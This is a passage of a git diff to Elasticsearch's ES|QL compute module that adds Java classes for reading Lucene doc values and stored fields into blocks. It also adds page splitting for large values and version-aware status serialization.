orig.getPositionCount()); + } + } + } + try (Block targetBlock = fieldTypeBuilders[f].build()) { + target[f] = targetBlock.filter(backwards); + } + operator.sanityCheckBlock(rowStride[f], backwards.length, target[f], f); + } + if (target[0].getPositionCount() != docs.getPositionCount()) { + throw new IllegalStateException("partial pages not yet supported"); + } + } + + private void verifyBuilders(ComputeBlockLoaderFactory loaderBlockFactory, int shard) { + for (int f = 0; f < operator.fields.length; f++) { + if (builders[f][shard] == null) { + // Note that this relies on field.newShard() to set the loader and converter correctly for the current shard + builders[f][shard] = (Block.Builder) operator.fields[f].loader.builder(loaderBlockFactory, docs.getPositionCount()); + converters[f][shard] = operator.fields[f].loader; + } + } + } + + private void read(int doc, int shard) throws IOException { + storedFields.advanceTo(doc); + for (int f = 0; f < builders.length; f++) { + rowStride[f].read(doc, storedFields, builders[f][shard]); + } + } + + @Override + public void close() { + Releasables.closeExpectNoException(fieldTypeBuilders); + for (int f = 0; f < operator.fields.length; f++) { + Releasables.closeExpectNoException(builders[f]); + } + } + + private long estimatedRamBytesUsed() { + long estimated = 0; + for (Block.Builder[] builders : this.builders) { + for (Block.Builder builder : builders) { + if (builder != null) { + estimated += builder.estimatedBytes(); + } + } + } + return estimated; + } + } + + private void fieldsMoved(LeafReaderContext ctx, int shard) throws IOException { + 
StoredFieldsSpec storedFieldsSpec = StoredFieldsSpec.NO_REQUIREMENTS; + for (int f = 0; f < operator.fields.length; f++) { + ValuesSourceReaderOperator.FieldWork field = operator.fields[f]; + rowStride[f] = field.rowStride(ctx); + storedFieldsSpec = storedFieldsSpec.merge(field.loader.rowStrideStoredFieldSpec()); + } + SourceLoader sourceLoader = null; + if (storedFieldsSpec.requiresSource()) { + sourceLoader = operator.shardContexts.get(shard).newSourceLoader().get(); + storedFieldsSpec = storedFieldsSpec.merge(new StoredFieldsSpec(true, false, sourceLoader.requiredStoredFields())); + } + storedFields = new BlockLoaderStoredFieldsFromLeafLoader( + StoredFieldLoader.fromSpec(storedFieldsSpec).getLoader(ctx, null), + sourceLoader != null ? sourceLoader.leaf(ctx.reader(), null) : null + ); + if (false == storedFieldsSpec.equals(StoredFieldsSpec.NO_REQUIREMENTS)) { + operator.trackStoredFields(storedFieldsSpec, false); + } + } +} diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesFromSingleReader.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesFromSingleReader.java new file mode 100644 index 0000000000000..d47a015c24578 --- /dev/null +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesFromSingleReader.java @@ -0,0 +1,238 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.compute.lucene.read; + +import org.apache.lucene.index.LeafReaderContext; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.DocVector; +import org.elasticsearch.core.Releasable; +import org.elasticsearch.core.Releasables; +import org.elasticsearch.index.fieldvisitor.StoredFieldLoader; +import org.elasticsearch.index.mapper.BlockLoader; +import org.elasticsearch.index.mapper.BlockLoaderStoredFieldsFromLeafLoader; +import org.elasticsearch.index.mapper.SourceLoader; +import org.elasticsearch.logging.LogManager; +import org.elasticsearch.logging.Logger; +import org.elasticsearch.search.fetch.StoredFieldsSpec; + +import java.io.IOException; +import java.util.ArrayList; +import java.util.List; + +/** + * Loads values from a single leaf. Much more efficient than {@link ValuesFromManyReader}. + */ +class ValuesFromSingleReader extends ValuesReader { + private static final Logger log = LogManager.getLogger(ValuesFromSingleReader.class); + + /** + * Minimum number of documents for which it is more efficient to use a + * sequential stored field reader when reading stored fields. + *

+ * The sequential stored field reader decompresses a whole block of docs + * at a time so for very short lists it won't be faster to use it. We use + * {@code 10} documents as the boundary for "very short" because it's what + * search does, not because we've done extensive testing on the number. + *

+ */ + static final int SEQUENTIAL_BOUNDARY = 10; + + private final int shard; + private final int segment; + + ValuesFromSingleReader(ValuesSourceReaderOperator operator, DocVector docs) { + super(operator, docs); + this.shard = docs.shards().getInt(0); + this.segment = docs.segments().getInt(0); + log.debug("initialized {} positions", docs.getPositionCount()); + } + + @Override + protected void load(Block[] target, int offset) throws IOException { + if (docs.singleSegmentNonDecreasing()) { + loadFromSingleLeaf(operator.jumboBytes, target, new ValuesReaderDocs(docs), offset); + return; + } + if (offset != 0) { + throw new IllegalStateException("can only load partial pages with single-segment non-decreasing pages"); + } + int[] forwards = docs.shardSegmentDocMapForwards(); + Block[] unshuffled = new Block[target.length]; + try { + loadFromSingleLeaf( + Long.MAX_VALUE, // Effectively disable splitting pages when we're not loading in order + unshuffled, + new ValuesReaderDocs(docs).mapped(forwards), + 0 + ); + final int[] backwards = docs.shardSegmentDocMapBackwards(); + for (int i = 0; i < unshuffled.length; i++) { + target[i] = unshuffled[i].filter(backwards); + unshuffled[i].close(); + unshuffled[i] = null; + } + } finally { + Releasables.closeExpectNoException(unshuffled); + } + } + + private void loadFromSingleLeaf(long jumboBytes, Block[] target, ValuesReaderDocs docs, int offset) throws IOException { + int firstDoc = docs.get(offset); + operator.positionFieldWork(shard, segment, firstDoc); + StoredFieldsSpec storedFieldsSpec = StoredFieldsSpec.NO_REQUIREMENTS; + LeafReaderContext ctx = operator.ctx(shard, segment); + + List columnAtATimeReaders = new ArrayList<>(operator.fields.length); + List rowStrideReaders = new ArrayList<>(operator.fields.length); + try (ComputeBlockLoaderFactory loaderBlockFactory = new ComputeBlockLoaderFactory(operator.blockFactory)) { + for (int f = 0; f < operator.fields.length; f++) { + ValuesSourceReaderOperator.FieldWork field = operator.fields[f]; + BlockLoader.ColumnAtATimeReader columnAtATime = field.columnAtATime(ctx); + if (columnAtATime != null) { + columnAtATimeReaders.add(new ColumnAtATimeWork(columnAtATime, f)); + } else { + rowStrideReaders.add( + new RowStrideReaderWork( + field.rowStride(ctx), + (Block.Builder) field.loader.builder(loaderBlockFactory, docs.count() - offset), + field.loader, + f + ) + ); + storedFieldsSpec = storedFieldsSpec.merge(field.loader.rowStrideStoredFieldSpec()); + } + } + + if (rowStrideReaders.isEmpty() == false) { + loadFromRowStrideReaders(jumboBytes, target, storedFieldsSpec, rowStrideReaders, ctx, docs, offset); + } + for (ColumnAtATimeWork r : columnAtATimeReaders) { + target[r.idx] = (Block) r.reader.read(loaderBlockFactory, docs, offset); + operator.sanityCheckBlock(r.reader, docs.count() - offset, target[r.idx], r.idx); + } + if (log.isDebugEnabled()) { + long total = 0; + for (Block b : target) { + total += b.ramBytesUsed(); + } + log.debug("loaded {} positions total ({} bytes)", target[0].getPositionCount(), total); + } + } finally { + Releasables.close(rowStrideReaders); + } + } + + private void loadFromRowStrideReaders( + long jumboBytes, + Block[] target, + StoredFieldsSpec storedFieldsSpec, + List rowStrideReaders, + LeafReaderContext ctx, + ValuesReaderDocs docs, + int offset + ) throws IOException { + SourceLoader sourceLoader = null; + ValuesSourceReaderOperator.ShardContext shardContext = operator.shardContexts.get(shard); + if (storedFieldsSpec.requiresSource()) { + sourceLoader = 
shardContext.newSourceLoader().get(); + storedFieldsSpec = storedFieldsSpec.merge(new StoredFieldsSpec(true, false, sourceLoader.requiredStoredFields())); + } + if (storedFieldsSpec.equals(StoredFieldsSpec.NO_REQUIREMENTS)) { + throw new IllegalStateException( + "found row stride readers [" + rowStrideReaders + "] without stored fields [" + storedFieldsSpec + "]" + ); + } + StoredFieldLoader storedFieldLoader; + if (useSequentialStoredFieldsReader(docs, shardContext.storedFieldsSequentialProportion())) { + storedFieldLoader = StoredFieldLoader.fromSpecSequential(storedFieldsSpec); + operator.trackStoredFields(storedFieldsSpec, true); + } else { + storedFieldLoader = StoredFieldLoader.fromSpec(storedFieldsSpec); + operator.trackStoredFields(storedFieldsSpec, false); + } + BlockLoaderStoredFieldsFromLeafLoader storedFields = new BlockLoaderStoredFieldsFromLeafLoader( + storedFieldLoader.getLoader(ctx, null), + sourceLoader != null ? sourceLoader.leaf(ctx.reader(), null) : null + ); + int p = offset; + long estimated = 0; + while (p < docs.count() && estimated < jumboBytes) { + int doc = docs.get(p++); + storedFields.advanceTo(doc); + for (RowStrideReaderWork work : rowStrideReaders) { + work.read(doc, storedFields); + } + estimated = estimatedRamBytesUsed(rowStrideReaders); + log.trace("{}: bytes loaded {}/{}", p, estimated, jumboBytes); + } + for (RowStrideReaderWork work : rowStrideReaders) { + target[work.idx] = work.build(); + operator.sanityCheckBlock(work.reader, p - offset, target[work.idx], work.idx); + } + if (log.isDebugEnabled()) { + long actual = 0; + for (RowStrideReaderWork work : rowStrideReaders) { + actual += target[work.idx].ramBytesUsed(); + } + log.debug("loaded {} positions row stride estimated/actual {}/{} bytes", p - offset, estimated, actual); + } + docs.setCount(p); + } + + /** + * Is it more efficient to use a sequential stored field reader + * when reading stored fields for the documents contained in {@code docIds}? + */ + private boolean useSequentialStoredFieldsReader(BlockLoader.Docs docs, double storedFieldsSequentialProportion) { + int count = docs.count(); + if (count < SEQUENTIAL_BOUNDARY) { + return false; + } + int range = docs.get(count - 1) - docs.get(0); + return range * storedFieldsSequentialProportion <= count; + } + + /** + * Work for building a column-at-a-time. 
+ * @param reader reads the values + * @param idx destination in array of {@linkplain Block}s we build + */ + private record ColumnAtATimeWork(BlockLoader.ColumnAtATimeReader reader, int idx) {} + + /** + * Work for building a block from a row-stride reader. + * @param reader reads the values + * @param builder accumulates the values as they are read + * @param loader converts the finished block to the field's desired type + * @param idx destination in array of {@linkplain Block}s we build + */ + private record RowStrideReaderWork(BlockLoader.RowStrideReader reader, Block.Builder builder, BlockLoader loader, int idx) + implements + Releasable { + void read(int doc, BlockLoaderStoredFieldsFromLeafLoader storedFields) throws IOException { + reader.read(doc, storedFields, builder); + } + + Block build() { + return (Block) loader.convert(builder.build()); + } + + @Override + public void close() { + builder.close(); + } + } + + private long estimatedRamBytesUsed(List<RowStrideReaderWork> rowStrideReaders) { + long estimated = 0; + for (RowStrideReaderWork r : rowStrideReaders) { + estimated += r.builder.estimatedBytes(); + } + return estimated; + } +} diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesReader.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesReader.java new file mode 100644 index 0000000000000..d3b8b0edcec3d --- /dev/null +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesReader.java @@ -0,0 +1,58 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.compute.lucene.read; + +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.DocVector; +import org.elasticsearch.core.ReleasableIterator; +import org.elasticsearch.core.Releasables; + +import java.io.IOException; +import java.io.UncheckedIOException; + +public abstract class ValuesReader implements ReleasableIterator<Block[]> { + protected final ValuesSourceReaderOperator operator; + protected final DocVector docs; + private int offset; + + ValuesReader(ValuesSourceReaderOperator operator, DocVector docs) { + this.operator = operator; + this.docs = docs; + } + + @Override + public boolean hasNext() { + return offset < docs.getPositionCount(); + } + + @Override + public Block[] next() { + Block[] target = new Block[operator.fields.length]; + boolean success = false; + try { + load(target, offset); + success = true; + for (Block b : target) { + operator.valuesLoaded += b.getTotalValueCount(); + } + offset += target[0].getPositionCount(); + return target; + } catch (IOException e) { + throw new UncheckedIOException(e); + } finally { + if (success == false) { + Releasables.closeExpectNoException(target); + } + } + } + + protected abstract void load(Block[] target, int offset) throws IOException; + + @Override + public void close() {} +} diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesReaderDocs.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesReaderDocs.java new file mode 100644 index 0000000000000..2e138dc2d0446 --- /dev/null +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesReaderDocs.java @@ -0,0 +1,69 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements.
Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.compute.lucene.read; + +import org.elasticsearch.compute.data.DocVector; +import org.elasticsearch.core.Nullable; +import org.elasticsearch.index.mapper.BlockLoader; + +/** + * Implementation of {@link BlockLoader.Docs} for ESQL. It's important that + * only this implementation, and the implementation returned by {@link #mapped} + * exist. This allows the jvm to inline the {@code invokevirtual}s to call + * the interface in hot, hot code. + *

+ * We've investigated moving the {@code offset} parameter from + * {@link BlockLoader.ColumnAtATimeReader#read} into this. That's more + * readable, but a clock cycle slower. + *

+ *

+ * When we tried having a {@link Nullable} map member instead of a subclass, + * that was also slower. + *

+ */ +class ValuesReaderDocs implements BlockLoader.Docs { + private final DocVector docs; + private int count; + + ValuesReaderDocs(DocVector docs) { + this.docs = docs; + this.count = docs.getPositionCount(); + } + + final Mapped mapped(int[] forwards) { + return new Mapped(docs, forwards); + } + + public final void setCount(int count) { + this.count = count; + } + + @Override + public final int count() { + return count; + } + + @Override + public int get(int i) { + return docs.docs().getInt(i); + } + + private class Mapped extends ValuesReaderDocs { + private final int[] forwards; + + private Mapped(DocVector docs, int[] forwards) { + super(docs); + this.forwards = forwards; + } + + @Override + public int get(int i) { + return super.get(forwards[i]); + } + } +} diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesSourceReaderOperator.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesSourceReaderOperator.java new file mode 100644 index 0000000000000..6d0ebb9c312d0 --- /dev/null +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesSourceReaderOperator.java @@ -0,0 +1,327 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. + */ + +package org.elasticsearch.compute.lucene.read; + +import org.apache.lucene.index.IndexReader; +import org.apache.lucene.index.LeafReaderContext; +import org.elasticsearch.common.unit.ByteSizeValue; +import org.elasticsearch.compute.data.Block; +import org.elasticsearch.compute.data.BlockFactory; +import org.elasticsearch.compute.data.DocBlock; +import org.elasticsearch.compute.data.DocVector; +import org.elasticsearch.compute.data.ElementType; +import org.elasticsearch.compute.data.Page; +import org.elasticsearch.compute.lucene.LuceneSourceOperator; +import org.elasticsearch.compute.operator.AbstractPageMappingToIteratorOperator; +import org.elasticsearch.compute.operator.DriverContext; +import org.elasticsearch.compute.operator.Operator; +import org.elasticsearch.core.ReleasableIterator; +import org.elasticsearch.index.mapper.BlockLoader; +import org.elasticsearch.index.mapper.SourceLoader; +import org.elasticsearch.search.fetch.StoredFieldsSpec; + +import java.io.IOException; +import java.util.List; +import java.util.Map; +import java.util.TreeMap; +import java.util.function.IntFunction; +import java.util.function.Supplier; + +/** + * Operator that extracts doc_values from a Lucene index out of pages that have been produced by {@link LuceneSourceOperator} + * and outputs them to a new column. + */ +public class ValuesSourceReaderOperator extends AbstractPageMappingToIteratorOperator { + /** + * Creates a factory for {@link ValuesSourceReaderOperator}. 
+ * @param fields fields to load + * @param shardContexts per-shard loading information + * @param docChannel the channel containing the shard, leaf/segment and doc id + */ + public record Factory(ByteSizeValue jumboSize, List fields, List shardContexts, int docChannel) + implements + OperatorFactory { + public Factory { + if (fields.isEmpty()) { + throw new IllegalStateException("ValuesSourceReaderOperator doesn't support empty fields"); + } + } + + @Override + public Operator get(DriverContext driverContext) { + return new ValuesSourceReaderOperator(driverContext.blockFactory(), jumboSize.getBytes(), fields, shardContexts, docChannel); + } + + @Override + public String describe() { + StringBuilder sb = new StringBuilder(); + sb.append("ValuesSourceReaderOperator[fields = ["); + if (fields.size() < 10) { + boolean first = true; + for (FieldInfo f : fields) { + if (first) { + first = false; + } else { + sb.append(", "); + } + sb.append(f.name); + } + } else { + sb.append(fields.size()).append(" fields"); + } + return sb.append("]]").toString(); + } + } + + /** + * Configuration for a field to load. + * + * {@code blockLoader} maps shard index to the {@link BlockLoader}s + * which load the actual blocks. + */ + public record FieldInfo(String name, ElementType type, IntFunction blockLoader) {} + + public record ShardContext(IndexReader reader, Supplier newSourceLoader, double storedFieldsSequentialProportion) {} + + final BlockFactory blockFactory; + /** + * When the loaded fields {@link Block}s' estimated size grows larger than this, + * we finish loading the {@linkplain Page} and return it, even if + * the {@linkplain Page} is shorter than the incoming {@linkplain Page}. + *

+ * NOTE: This only applies when loading single-segment, non-descending + * row stride bytes. That is the most common way to load giant fields, + * but it isn't the only way. + *

+ */ + final long jumboBytes; + final FieldWork[] fields; + final List shardContexts; + private final int docChannel; + + private final Map readersBuilt = new TreeMap<>(); + long valuesLoaded; + + private int lastShard = -1; + private int lastSegment = -1; + + /** + * Creates a new extractor + * @param fields fields to load + * @param docChannel the channel containing the shard, leaf/segment and doc id + */ + public ValuesSourceReaderOperator( + BlockFactory blockFactory, + long jumboBytes, + List fields, + List shardContexts, + int docChannel + ) { + if (fields.isEmpty()) { + throw new IllegalStateException("ValuesSourceReaderOperator doesn't support empty fields"); + } + this.blockFactory = blockFactory; + this.jumboBytes = jumboBytes; + this.fields = fields.stream().map(FieldWork::new).toArray(FieldWork[]::new); + this.shardContexts = shardContexts; + this.docChannel = docChannel; + } + + @Override + protected ReleasableIterator receive(Page page) { + DocVector docVector = page.getBlock(docChannel).asVector(); + return appendBlockArrays( + page, + docVector.singleSegment() ? new ValuesFromSingleReader(this, docVector) : new ValuesFromManyReader(this, docVector) + ); + } + + void positionFieldWork(int shard, int segment, int firstDoc) { + if (lastShard == shard) { + if (lastSegment == segment) { + for (FieldWork w : fields) { + w.sameSegment(firstDoc); + } + return; + } + lastSegment = segment; + for (FieldWork w : fields) { + w.sameShardNewSegment(); + } + return; + } + lastShard = shard; + lastSegment = segment; + for (FieldWork w : fields) { + w.newShard(shard); + } + } + + boolean positionFieldWorkDocGuaranteedAscending(int shard, int segment) { + if (lastShard == shard) { + if (lastSegment == segment) { + return false; + } + lastSegment = segment; + for (FieldWork w : fields) { + w.sameShardNewSegment(); + } + return true; + } + lastShard = shard; + lastSegment = segment; + for (FieldWork w : fields) { + w.newShard(shard); + } + return true; + } + + void trackStoredFields(StoredFieldsSpec spec, boolean sequential) { + readersBuilt.merge( + "stored_fields[" + + "requires_source:" + + spec.requiresSource() + + ", fields:" + + spec.requiredStoredFields().size() + + ", sequential: " + + sequential + + "]", + 1, + (prev, one) -> prev + one + ); + } + + protected class FieldWork { + final FieldInfo info; + + BlockLoader loader; + BlockLoader.ColumnAtATimeReader columnAtATime; + BlockLoader.RowStrideReader rowStride; + + FieldWork(FieldInfo info) { + this.info = info; + } + + void sameSegment(int firstDoc) { + if (columnAtATime != null && columnAtATime.canReuse(firstDoc) == false) { + columnAtATime = null; + } + if (rowStride != null && rowStride.canReuse(firstDoc) == false) { + rowStride = null; + } + } + + void sameShardNewSegment() { + columnAtATime = null; + rowStride = null; + } + + void newShard(int shard) { + loader = info.blockLoader.apply(shard); + columnAtATime = null; + rowStride = null; + } + + BlockLoader.ColumnAtATimeReader columnAtATime(LeafReaderContext ctx) throws IOException { + if (columnAtATime == null) { + columnAtATime = loader.columnAtATimeReader(ctx); + trackReader("column_at_a_time", this.columnAtATime); + } + return columnAtATime; + } + + BlockLoader.RowStrideReader rowStride(LeafReaderContext ctx) throws IOException { + if (rowStride == null) { + rowStride = loader.rowStrideReader(ctx); + trackReader("row_stride", this.rowStride); + } + return rowStride; + } + + private void trackReader(String type, BlockLoader.Reader reader) { + readersBuilt.merge(info.name + 
":" + type + ":" + reader, 1, (prev, one) -> prev + one); + } + } + + LeafReaderContext ctx(int shard, int segment) { + return shardContexts.get(shard).reader().leaves().get(segment); + } + + @Override + public String toString() { + StringBuilder sb = new StringBuilder(); + sb.append("ValuesSourceReaderOperator[fields = ["); + if (fields.length < 10) { + boolean first = true; + for (FieldWork f : fields) { + if (first) { + first = false; + } else { + sb.append(", "); + } + sb.append(f.info.name); + } + } else { + sb.append(fields.length).append(" fields"); + } + return sb.append("]]").toString(); + } + + @Override + protected ValuesSourceReaderOperatorStatus status( + long processNanos, + int pagesReceived, + int pagesEmitted, + long rowsReceived, + long rowsEmitted + ) { + return new ValuesSourceReaderOperatorStatus( + new TreeMap<>(readersBuilt), + processNanos, + pagesReceived, + pagesEmitted, + rowsReceived, + rowsEmitted, + valuesLoaded + ); + } + + /** + * Quick checks for on the loaded block to make sure it looks reasonable. + * @param loader the object that did the loading - we use it to make error messages if the block is busted + * @param expectedPositions how many positions the block should have - it's as many as the incoming {@link Page} has + * @param block the block to sanity check + * @param field offset into the {@link #fields} array for the block being loaded + */ + void sanityCheckBlock(Object loader, int expectedPositions, Block block, int field) { + if (block.getPositionCount() != expectedPositions) { + throw new IllegalStateException( + sanityCheckBlockErrorPrefix(loader, block, field) + + " has [" + + block.getPositionCount() + + "] positions instead of [" + + expectedPositions + + "]" + ); + } + if (block.elementType() != ElementType.NULL && block.elementType() != fields[field].info.type) { + throw new IllegalStateException( + sanityCheckBlockErrorPrefix(loader, block, field) + + "'s element_type [" + + block.elementType() + + "] NOT IN (NULL, " + + fields[field].info.type + + ")" + ); + } + } + + private String sanityCheckBlockErrorPrefix(Object loader, Block block, int field) { + return fields[field].info.name + "[" + loader + "]: " + block; + } +} diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesSourceReaderOperatorStatus.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesSourceReaderOperatorStatus.java new file mode 100644 index 0000000000000..4a8fcda81f82a --- /dev/null +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/lucene/read/ValuesSourceReaderOperatorStatus.java @@ -0,0 +1,159 @@ +/* + * Copyright Elasticsearch B.V. and/or licensed to Elasticsearch B.V. under one + * or more contributor license agreements. Licensed under the Elastic License + * 2.0; you may not use this file except in compliance with the Elastic License + * 2.0. 
+ */ + +package org.elasticsearch.compute.lucene.read; + +import org.elasticsearch.TransportVersion; +import org.elasticsearch.common.Strings; +import org.elasticsearch.common.io.stream.NamedWriteableRegistry; +import org.elasticsearch.common.io.stream.StreamInput; +import org.elasticsearch.common.io.stream.StreamOutput; +import org.elasticsearch.compute.operator.AbstractPageMappingOperator; +import org.elasticsearch.compute.operator.AbstractPageMappingToIteratorOperator; +import org.elasticsearch.compute.operator.Operator; +import org.elasticsearch.xcontent.XContentBuilder; + +import java.io.IOException; +import java.util.Map; +import java.util.Objects; + +import static org.elasticsearch.TransportVersions.ESQL_DOCUMENTS_FOUND_AND_VALUES_LOADED; +import static org.elasticsearch.TransportVersions.ESQL_DOCUMENTS_FOUND_AND_VALUES_LOADED_8_19; +import static org.elasticsearch.TransportVersions.ESQL_SPLIT_ON_BIG_VALUES; +import static org.elasticsearch.TransportVersions.ESQL_SPLIT_ON_BIG_VALUES_8_19; +import static org.elasticsearch.TransportVersions.ESQL_SPLIT_ON_BIG_VALUES_9_1; + +public class ValuesSourceReaderOperatorStatus extends AbstractPageMappingToIteratorOperator.Status { + public static final NamedWriteableRegistry.Entry ENTRY = new NamedWriteableRegistry.Entry( + Operator.Status.class, + "values_source_reader", + ValuesSourceReaderOperatorStatus::readFrom + ); + + private final Map readersBuilt; + private final long valuesLoaded; + + public ValuesSourceReaderOperatorStatus( + Map readersBuilt, + long processNanos, + int pagesReceived, + int pagesEmitted, + long rowsReceived, + long rowsEmitted, + long valuesLoaded + ) { + super(processNanos, pagesReceived, pagesEmitted, rowsReceived, rowsEmitted); + this.readersBuilt = readersBuilt; + this.valuesLoaded = valuesLoaded; + } + + static ValuesSourceReaderOperatorStatus readFrom(StreamInput in) throws IOException { + long processNanos; + int pagesReceived; + int pagesEmitted; + long rowsReceived; + long rowsEmitted; + if (supportsSplitOnBigValues(in.getTransportVersion())) { + AbstractPageMappingToIteratorOperator.Status status = new AbstractPageMappingToIteratorOperator.Status(in); + processNanos = status.processNanos(); + pagesReceived = status.pagesReceived(); + pagesEmitted = status.pagesEmitted(); + rowsReceived = status.rowsReceived(); + rowsEmitted = status.rowsEmitted(); + } else { + AbstractPageMappingOperator.Status status = new AbstractPageMappingOperator.Status(in); + processNanos = status.processNanos(); + pagesReceived = status.pagesProcessed(); + pagesEmitted = status.pagesProcessed(); + rowsReceived = status.rowsReceived(); + rowsEmitted = status.rowsEmitted(); + } + Map readersBuilt = in.readOrderedMap(StreamInput::readString, StreamInput::readVInt); + long valuesLoaded = supportsValuesLoaded(in.getTransportVersion()) ? in.readVLong() : 0; + return new ValuesSourceReaderOperatorStatus( + readersBuilt, + processNanos, + pagesReceived, + pagesEmitted, + rowsReceived, + rowsEmitted, + valuesLoaded + ); + } + + @Override + public void writeTo(StreamOutput out) throws IOException { + if (supportsSplitOnBigValues(out.getTransportVersion())) { + super.writeTo(out); + } else { + /* + * Before we knew how to split pages when reading large values + * our status just contained one int per page - just like AbstractPageMappingOperator.Status. 
+ */ + new AbstractPageMappingOperator.Status(processNanos(), pagesEmitted(), rowsReceived(), rowsEmitted()).writeTo(out); + } + out.writeMap(readersBuilt, StreamOutput::writeVInt); + if (supportsValuesLoaded(out.getTransportVersion())) { + out.writeVLong(valuesLoaded); + } + } + + private static boolean supportsSplitOnBigValues(TransportVersion version) { + return version.onOrAfter(ESQL_SPLIT_ON_BIG_VALUES) + || version.isPatchFrom(ESQL_SPLIT_ON_BIG_VALUES_9_1) + || version.isPatchFrom(ESQL_SPLIT_ON_BIG_VALUES_8_19); + } + + private static boolean supportsValuesLoaded(TransportVersion version) { + return version.onOrAfter(ESQL_DOCUMENTS_FOUND_AND_VALUES_LOADED) + || version.isPatchFrom(ESQL_DOCUMENTS_FOUND_AND_VALUES_LOADED_8_19); + } + + @Override + public String getWriteableName() { + return ENTRY.name; + } + + public Map readersBuilt() { + return readersBuilt; + } + + @Override + public long valuesLoaded() { + return valuesLoaded; + } + + @Override + public XContentBuilder toXContent(XContentBuilder builder, Params params) throws IOException { + builder.startObject(); + builder.startObject("readers_built"); + for (Map.Entry e : readersBuilt.entrySet()) { + builder.field(e.getKey(), e.getValue()); + } + builder.endObject(); + builder.field("values_loaded", valuesLoaded); + innerToXContent(builder); + return builder.endObject(); + } + + @Override + public boolean equals(Object o) { + if (super.equals(o) == false) return false; + ValuesSourceReaderOperatorStatus status = (ValuesSourceReaderOperatorStatus) o; + return readersBuilt.equals(status.readersBuilt) && valuesLoaded == status.valuesLoaded; + } + + @Override + public int hashCode() { + return Objects.hash(super.hashCode(), readersBuilt, valuesLoaded); + } + + @Override + public String toString() { + return Strings.toString(this); + } +} diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/AbstractPageMappingOperator.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/AbstractPageMappingOperator.java index d0b4aaad22a3e..84affa27dc5ec 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/AbstractPageMappingOperator.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/AbstractPageMappingOperator.java @@ -127,7 +127,7 @@ public Status(long processNanos, int pagesProcessed, long rowsReceived, long row this.rowsEmitted = rowsEmitted; } - protected Status(StreamInput in) throws IOException { + public Status(StreamInput in) throws IOException { processNanos = in.getTransportVersion().onOrAfter(TransportVersions.V_8_14_0) ? 
in.readVLong() : 0; pagesProcessed = in.readVInt(); if (in.getTransportVersion().onOrAfter(TransportVersions.ESQL_PROFILE_ROWS_PROCESSED)) { diff --git a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/AbstractPageMappingToIteratorOperator.java b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/AbstractPageMappingToIteratorOperator.java index 6a165fdfa055b..491885d5fae72 100644 --- a/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/AbstractPageMappingToIteratorOperator.java +++ b/x-pack/plugin/esql/compute/src/main/java/org/elasticsearch/compute/operator/AbstractPageMappingToIteratorOperator.java @@ -64,13 +64,38 @@ public abstract class AbstractPageMappingToIteratorOperator implements Operator */ protected abstract ReleasableIterator receive(Page page); + /** + * Append an {@link Iterator} of arrays of {@link Block}s to a + * {@link Page}, one after the other. It's required that the + * iterator emit as many positions as there were + * in the page. + */ + public static ReleasableIterator appendBlockArrays(Page page, ReleasableIterator toAdd) { + return new AppendBlocksIterator(page, toAdd); + } + /** * Append an {@link Iterator} of {@link Block}s to a {@link Page}, one * after the other. It's required that the iterator emit as many * positions as there were in the page. */ public static ReleasableIterator appendBlocks(Page page, ReleasableIterator toAdd) { - return new AppendBlocksIterator(page, toAdd); + return appendBlockArrays(page, new ReleasableIterator<>() { + @Override + public boolean hasNext() { + return toAdd.hasNext(); + } + + @Override + public Block[] next() { + return new Block[] { toAdd.next() }; + } + + @Override + public void close() { + toAdd.close(); + } + }); } @Override @@ -86,13 +111,24 @@ public final void addInput(Page page) { if (next != null) { assert next.hasNext() == false : "has pending input page"; next.close(); + next = null; } if (page.getPositionCount() == 0) { return; } - next = new RuntimeTrackingIterator(receive(page)); - pagesReceived++; - rowsReceived += page.getPositionCount(); + try { + next = new RuntimeTrackingIterator(receive(page)); + pagesReceived++; + rowsReceived += page.getPositionCount(); + } finally { + if (next == null) { + /* + * The `receive` operation failed, we need to release the incoming page + * because it's no longer owned by anyone. 
